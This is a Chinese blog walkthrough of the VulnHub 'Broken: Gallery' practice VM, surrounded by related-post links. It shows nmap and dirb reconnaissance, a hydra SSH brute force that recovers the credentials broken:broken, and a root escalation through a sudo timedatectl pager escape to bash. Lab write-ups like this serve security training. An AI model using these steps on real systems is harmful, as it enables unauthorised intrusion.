broken-gallery靶机

最新推荐文章于 2024-08-13 20:22:49 发布
最新推荐文章于 2024-08-13 20:22:49 发布
阅读量234 收藏 4
点赞数 9
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/141141585
版权

信息收集:

靶机地址:http://www.vulnhub.com/entry/broken-gallery,344/

(1)ip扫描,扫不到,配置仅主机就可以了

nmap 192.168.8.0/24 -sn | grep -B 2 '00:0C:29:CF:9F:D0'

(2)端口扫描

nmap 192.168.8.131 -p- -A -sV -Pn

(3)目录扫描,没啥发现

dirb http://192.168.8.131

(4)访问80端口,可以看到有一些文件

(5)readme.md 中是十六进制的值

(6)将内容写入readme.md中,使用 xxd 转换,查看文件,发现文件头为 JFIF ,是一张图片

(7)将后缀修改为 jpg ,查看图片

mv  readme.bin readme.jpg

(8)一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh

Bob
BROKEN
avrahamcohen.ac
broken

getshell:

(1)使用 hydra 进行爆破

hydra -L use.txt -P pas.txt ssh://192.168.8.131

得到账号密码:
broken:broken

(2)ssh连接,连接成功

ssh broken@192.168.8.131

提权:

(1)查看当前权限

sudo -l

(2)看到 timedatectl 可以执行root权限,执行命令,提权成功

sudo timedatectl list-timezones

!/bin/bash

阿卡丽的神秘铺子
关注
broken-gallery靶机渗透测试
weixin_58786230的博客
08-12 190
【代码】broken-gallery靶机渗透测试。
Broken: Gallery靶机
m0_65285254的博客
08-13 343
靶机ip地址为 192.168.153.157。点击查看,目录拼接访问,没有发现什么有用信息。爆破出密码 broken | broken。尝试22端口的ssh进行爆破。
vulnhub系列:broken-gallery
jq_j37的博客
08-10 289
vulnhub系列:broken-gallery靶机,打靶文章
Broken: Gallery靶机复现
weixin_52956666的博客
08-13 362
靶机IP为192.168.112.142。sudo -l查看免密操作。尝试爆破ssh账号密码。靶机设置为NAT模式。查看后发现都没什么用。
vulnhub靶机 broken-gallery(渗透测试详解)
2301_78721909的博客
08-11 163
vulnhub靶机 broken-gallery(渗透测试详解)
漏洞复现 -- Broken: Gallery
2301_80854251的博客
06-29 193
漏洞复现 -- Broken: Gallery
broken靶机(计划任务提权)
m0_66299232的博客
11-27 432
9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份。3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本。5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹。
【vulnhub】Broken: Gallery靶机
wbplife的博客
08-12 256
尝试22端口的ssh进行爆破。尝试timedatectl。
broken-gallery靶场实战【超详细】
weixin_68615160的博客
08-13 353
5、是一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh。看到 timedatectl 可以执行root权限,执行命令,提权成功。将内容写入readme.md中,使用 xxd 转换。3、查看文件,发现文件头为 JFIF ,是一张图片。2、发现readme.md 中是十六进制的值。4、将后缀修改为 jpg ,查看图片。6、使用 hydra 进行爆破。3、探测靶机主机、端口、服务。账户和密码都是:broken。注意下载xxd的时候会报错。4、对靶机进行目录扫描。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8493
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
多台三相逆变器并联(本模型为三台并联,市面上多为两台并联)matlab simulink仿真 功能:实现并联系统中各逆变器输出
最新发布
10-09
多台三相逆变器并联(本模型为三台并联,市面上多为两台并联)matlab simulink仿真。 功能:实现并联系统中各逆变器输出功率均分。 (有能力的话还可以研究下垂特性、功率指令以及静态功工作点三者之间的联系) 控制策略:VSG控制策略(同步机控制) 逆变器主电路:三相逆变器,LCL滤波电路,VSG控制模块。 VSG控制模块:定、转子方程,dq变,电压电流双闭环,预同步,pwm发生器。
Ringtones波点音乐-《Lightning Moment》.mp3
10-09
Ringtones波点音乐-《Lightning Moment》.mp3
onnx2onnx-0.3.1.tar.gz
10-09
onnx2onnx-0.3.1.tar
网页商城系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
10-09
网页商城系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值